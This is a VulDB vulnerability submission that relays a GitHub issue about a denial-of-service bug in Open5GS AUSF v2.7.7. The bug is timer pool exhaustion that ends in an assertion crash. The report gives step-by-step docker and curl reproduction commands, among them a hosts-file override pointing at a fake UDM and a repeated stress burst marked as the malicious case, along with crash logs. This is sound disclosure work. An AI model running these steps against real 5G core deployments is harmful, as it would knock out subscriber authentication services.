Soumettre #817031: Open5GS AUSF v2.7.7 Denial of Serviceinformation

Titre	Open5GS AUSF v2.7.7 Denial of Service
Description	### Open5GS Release, Revision, or Tag v2.7.7 ### Description AUSF crashes when a valid authentication context exists and `PUT /nausf-auth/v1/ue-authentications/{authCtxId}/5g-aka-confirmation` is sent in repeated bursts while UDM keeps `POST /nudm-ueau/v1/{supi}/auth-events` hanging. This follows the same pending-xact pattern as the already confirmed `POST /nausf-auth/v1/ue-authentications` timer-pool issue, but the final abort site is different: ```c r = ausf_sbi_discover_and_send(...); ogs_expect(r == OGS_OK); ogs_assert(r != OGS_ERROR); ``` for the confirmation handler: ```c bool ausf_nausf_auth_handle_authenticate_confirmation(...) ``` As with the POST route, client-side HTTP/2 streams are released on RST/close, while outbound `nudm-ueau` xacts and their response timers remain pending until timeout. Repeating short-lived confirmation bursts therefore consumes the timer pool until `ogs_timer_add()` fails, `ausf_sbi_discover_and_send()` returns `OGS_ERROR`, and AUSF aborts at `nausf-handler.c:115`. ### Root cause - Entry route: `PUT /nausf-auth/v1/ue-authentications/{authCtxId}/5g-aka-confirmation` - Preconditions: a valid auth context must already exist, and UDM must keep `POST /nudm-ueau/v1/{supi}/auth-events` hanging - Exact crash site: `../src/ausf/nausf-handler.c:115` - Upstream failures: `../lib/core/ogs-timer.c:82-85` `../lib/sbi/context.c:2592-2600` `../src/ausf/sbi-path.c:97-103` - Root cause family: timer pool exhaustion leading to assertion abort - Controlling factor: number of short-lived confirmation requests whose outbound `auth-events` xacts remain pending ### Steps to reproduce 1. Start the controllable fake UDM: ```bash docker stop fake-ausf-udm 2>/dev/null \|\| true printf 'control\n' > /home/ubuntu/open5gs_277/.audit_tmp/ausf_fake_udm.mode docker run --rm -d \ --name fake-ausf-udm \ --network open5gs \ -v /home/ubuntu/open5gs_277/.audit_tmp:/srv \ node:24-alpine \ node /srv/ausf_fake_udm.js ``` 2. Restart AUSF, override `udm.open5gs.org` to the fake UDM, and create one valid auth context: ```bash docker restart ausf docker exec ausf sh -lc "grep -v 'udm.open5gs.org' /etc/hosts > /tmp/hosts.new && printf '10.33.33.9\tudm.open5gs.org\n' >> /tmp/hosts.new && cat /tmp/hosts.new > /etc/hosts" docker run --rm --network open5gs curlimages/curl:8.10.1 \ --http2-prior-knowledge -sS -D - \ -H content-type:application/json \ --data '{"supiOrSuci":"suci-0-001-01-0-0-0-000000000000001","servingNetworkName":"5G:mnc001.mcc001.3gppnetwork.org"}' \ http://ausf.open5gs.org/nausf-auth/v1/ue-authentications ``` The returned confirmation path in this repro was: ```text /nausf-auth/v1/ue-authentications/1/5g-aka-confirmation ``` 3. Control case: one launch-only burst while UDM hangs `POST /auth-events`. AUSF should stay running. ```bash printf 'hang-auth-events-post\n' > /home/ubuntu/open5gs_277/.audit_tmp/ausf_fake_udm.mode docker exec fake-ausf-udm sh -lc 'AUSF_STRESS_METHOD=PUT AUSF_STRESS_PATH=/nausf-auth/v1/ue-authentications/1/5g-aka-confirmation AUSF_STRESS_BODY_FILE=/srv/ausf_confirmation_body.json AUSF_STRESS_CONNECTIONS=8 AUSF_STRESS_REQUESTS_PER_CONNECTION=256 AUSF_STRESS_LAUNCH_ONLY_MS=1000 node /srv/ausf_request_stress.js' docker inspect -f '{{.State.Status}} {{.State.ExitCode}}' ausf ``` 4. Malicious case: repeat the same burst several times so `auth-events` xacts accumulate and exhaust the timer pool. ```bash docker exec fake-ausf-udm sh -lc 'for i in 1 2 3 4 5 6 7; do AUSF_STRESS_METHOD=PUT AUSF_STRESS_PATH=/nausf-auth/v1/ue-authentications/1/5g-aka-confirmation AUSF_STRESS_BODY_FILE=/srv/ausf_confirmation_body.json AUSF_STRESS_CONNECTIONS=8 AUSF_STRESS_REQUESTS_PER_CONNECTION=256 AUSF_STRESS_LAUNCH_ONLY_MS=1000 node /srv/ausf_request_stress.js; done' docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' ausf docker logs --tail 120 ausf 2>&1 ``` ### Logs ```shell 04/23 01:59:22.204: [event] ERROR: Failed to allocate timer object from pool (../lib/core/ogs-timer.c:84) 04/23 01:59:22.204: [sbi] ERROR: ogs_timer_add() failed (../lib/sbi/context.c:2596) 04/23 01:59:22.204: [ausf] ERROR: ausf_sbi_discover_and_send() failed (../src/ausf/sbi-path.c:98) 04/23 01:59:22.212: [ausf] ERROR: ausf_nausf_auth_handle_authenticate_confirmation: Expectation `r == OGS_OK' failed. (../src/ausf/nausf-handler.c:114) 04/23 01:59:22.212: [ausf] FATAL: ausf_nausf_auth_handle_authenticate_confirmation: Assertion `r != OGS_ERROR' failed. (../src/ausf/nausf-handler.c:115) ``` ### Expected behaviour AUSF should reject excess pending confirmation work with a normal HTTP error and remain running. ### Observed Behaviour Repeated launch-only confirmation bursts exhaust the timer pool for pending `auth-events` xacts and crash AUSF with exit code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
La source	⚠️ https://github.com/open5gs/open5gs/issues/4472
Utilisateur	ZiyuLin (UID 93568)
Soumission	01/05/2026 10:36 (il y a 1 mois)
Modérer	16/05/2026 14:38 (15 days later)
Statut	Accepté
Entrée VulDB	364332 [Open5GS jusqu’à 2.7.7 AUSF nausf-handler.c ogs_timer_add déni de service]
Points	20

◂ Précédent Aperçu Suivant ▸

Interested in the pricing of exploits?

See the underground prices here!